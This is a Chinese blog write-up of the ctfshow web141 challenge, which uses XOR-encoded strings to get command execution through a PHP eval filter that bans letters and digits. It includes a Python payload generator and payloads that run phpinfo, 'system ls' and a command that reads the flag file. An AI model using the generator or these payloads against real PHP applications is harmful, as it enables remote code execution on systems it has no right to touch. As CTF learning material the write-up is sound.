【ctfshow】php特性无字母数字异或RCE wp

| | | | 743

前言

记录web的题目wp,慢慢变强,铸剑。

无字母数字命令执行web141

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = (String)$_GET['v1'];
    $v2 = (String)$_GET['v2'];
    $v3 = (String)$_GET['v3'];

    if(is_numeric($v1) && is_numeric($v2)){
        if(preg_match('/^\W+$/', $v3)){
            $code =  eval("return $v1$v3$v2;");
            echo "$v1$v3$v2 = ".$code;
        }
    }
}

分析源代码,这里用了正则表达式/^\W+$/,把数字和字母还有下划线给ban了,之前无字母数字的webshell我们用异或来吧(或运算,异或,取反等等都可以)

也可以使用导航中regex101进行正则自动判断分析

image-20211010105049748

简单异或形成的原因分析一下,写个php代码

1
2
3
4
<?php
highlight_file(__FILE__);
eval($_GET['a']);
?>

当我们传入a的参数,输入的值进行异或,可以得到一些字符串比如,可以构造字符phpinfo,但使用的是ascii码中32-126之间的字符,除去大小写字母和数字还有下划线,能够构造字母

1
a=echo (("%0b%08%0b%09%0e%06%0f")^("%7b%60%7b%60%60%60%60"));

image-20211010105753504

所以,当我们使用phpinfo时,可以直接构造如下payload,成功命令执行

1
a=echo (("%0b%08%0b%09%0e%06%0f")^("%7b%60%7b%60%60%60%60"))();

image-20211010105919095

由于一个个筛选很麻烦,所以写一个脚本直接生成异或之后的字符,如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
# # -- coding:UTF-8 --
# # Author:孤桜懶契
# # Date:2021/10/10
# # blog: gylq.gitee.io

import requests
import urllib
import re


# 生成可用的字符
def general_rce():
    result = ''
    preg = '[a-zA-Z0-9]'
    for i in range(256):
        for j in range(256):
            if not (re.match(preg,chr(i),re.I) or re.match(preg,chr(j),re.I)):
                x = i ^ j
                if x >= 32 and x <= 126:
                    a = '%' + hex(i)[2:].zfill(2)
                    b = '%' + hex(j)[2:].zfill(2)
                    result += (chr(x) + ' ' + a + ' ' + b + '\n')
    f = open('xor_rce.txt', 'w')
    f.write(result)

# 根据输入的命令在生成的txt中进行匹配
def action(arg):
    s1 = ""
    s2 = ""
    for i in arg:
        f = open("xor_rce.txt", "r")
        while True:
            t = f.readline()
            if t == '':
                break
            if t[0] == i:
                s1 += t[2:5]
                s2 += t[6:9]
                break
        f.close()
    output = ("((\"" + s1 + "\")" + "^" + "(\"" + s2 + "\"))")
    return output

def main():
    general_rce()
    while True:
        s1 = input("\n[+] your function: ")
        if s1 == "exit":
            break
        s2 = input("[+] your command: ")
        param = action(s1) + action(s2)
        print("\n[*] result: \n" + param)

main()

当我们想要执行system ls 时,直接执行这个脚本获得

image-20211010110127469

接着复制上去就可以看到结果

1
a=(("%08%02%08%08%05%0d")^("%7b%7b%7b%7c%60%60"))(("%0c%08")^("%60%7b"));

image-20211010110152542

所以我们分析一下这题,可以发现v1和v2都为数字可以不用管,但是想要执行return,前面的v1后面得跟一个连接符,不然无法执行命令,所以v3前面加个连接符/*-|都行,我用除号,就可以构造payload,读取flag

1
v1=1&v2=1&v3=/(("%08%02%08%08%05%0d")^("%7b%7b%7b%7c%60%60"))(("%08%01%03%00%06%0c%01%07%00%0b%08%0b")^("%7c%60%60%20%60%60%60%60%2e%7b%60%7b"));

image-20211010110401754

我的个人博客

孤桜懶契:http://gylq.gitee.io

本文标题:【ctfshow】php特性无字母数字异或RCE wp

文章作者:孤桜懶契

发布时间:2021年10月10日 - 10:47:06

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/169.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------
欢迎光临
❤️
孤桜懶契
请多关照
❤️
❤️